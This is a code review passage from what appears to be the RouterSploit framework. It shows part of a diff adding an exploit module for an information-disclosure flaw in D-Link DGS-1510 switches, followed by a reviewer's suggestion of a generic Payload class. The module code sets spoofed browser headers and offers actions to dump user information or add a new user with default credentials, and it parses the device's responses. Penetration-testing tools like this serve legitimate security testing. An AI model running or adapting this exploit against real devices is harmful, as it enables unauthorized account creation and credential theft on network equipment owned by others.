routersploit/modules/exploits/dlink/dgs_1510_information_disclosure.py

```diff
@@ -0,0 +1,167 @@
+            "headers": {
+                "Connection": "keep-alive",
+                "Cache-Control": "max-age=0",
+                "Origin": "{}:{}/",
+                "Upgrade-Insecure-Requests": "1",
+                "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36",
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+                "Referer": "{}:{}/www/login.html",
+                "Accept-Encoding": "gzip, deflate",
+                "Accept-Language": "en-US,en;q=0.8"
+            }
+        }
+    }
+    target = exploits.Option('http://192.168.1.1', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    action = exploits.Option('user_info',
+                             'Information to retrieve like user information or adding new user. '
+                             'Valid actions {}.'.format(information_disclosure_actions.keys()),
+                             validators=validators.choice(information_disclosure_actions.keys()))
+    port = exploits.Option(80, 'Target port')  # default port
+    username = exploits.Option('dlinkuser', 'User to add in case that user_add option is used.')
+    password = exploits.Option('dlinkpwd1234', 'Password for user in case that user_add option is used.')
+    response_content = None
+
+    def decompress(self, content, encoding):
+        ret = content
+
+        if encoding == 'gzip':
+            ret = gzip.GzipFile(fileobj=StringIO(ret)).read()
+
+        elif encoding == 'deflate':
+            decompress = zlib.decompressobj(-zlib.MAX_WBITS)
+            inflated = decompress.decompress(ret)
+            inflated += decompress.flush()
+            ret = inflated
+
+        return ret.replace("\n", "")
+
+    def parse_print(self, content):
+
+        if self.action == "user_info":
+            m_groups = re.match(r'(.*)UserInfo.=.([^;]*)(.*)', content, re.I | re.M)
+
+            if m_groups and m_groups.groups > 2:
+                print_table(("User Info", ), (m_groups.group(2), ))
+            else:
+                # Print something, in case that formats vary over models
+                # maybe regex will not work and we don't want to leave
+                # users without information
+                print_table(("User Info", ), (content, ))
+
+        elif self.action == "user_add":
+            print_success("User {} with password {} created.".format(self.username, self.password))
+
+    def validate_response(self, content):
+        validate_regex = None
+
+        if not content:
+            return False
+
+        if self.action == "user_info":
+            validate_regex = re.match(r'(.*)(UserInfo|user_count|var(.*))(.*);', content, re.I | re.M)
+
+            return True if validate_regex else False
+
+        elif self.action == "user_add":
```

Comment:
Can we go with some generic implementation of Payload :) like metasploit did where developers will implement their payload with additional parameters if needed (like in this case username, password etc) and link it with special object inside exploit (lets call it payload) and once when command 'exploit' is executed that payload will be used.

class Payload(object):
   <some common stuff>

class HttpPayload(Payload):
  <some properties>
  action = "user_info"

def build():
  pass

Just idea :)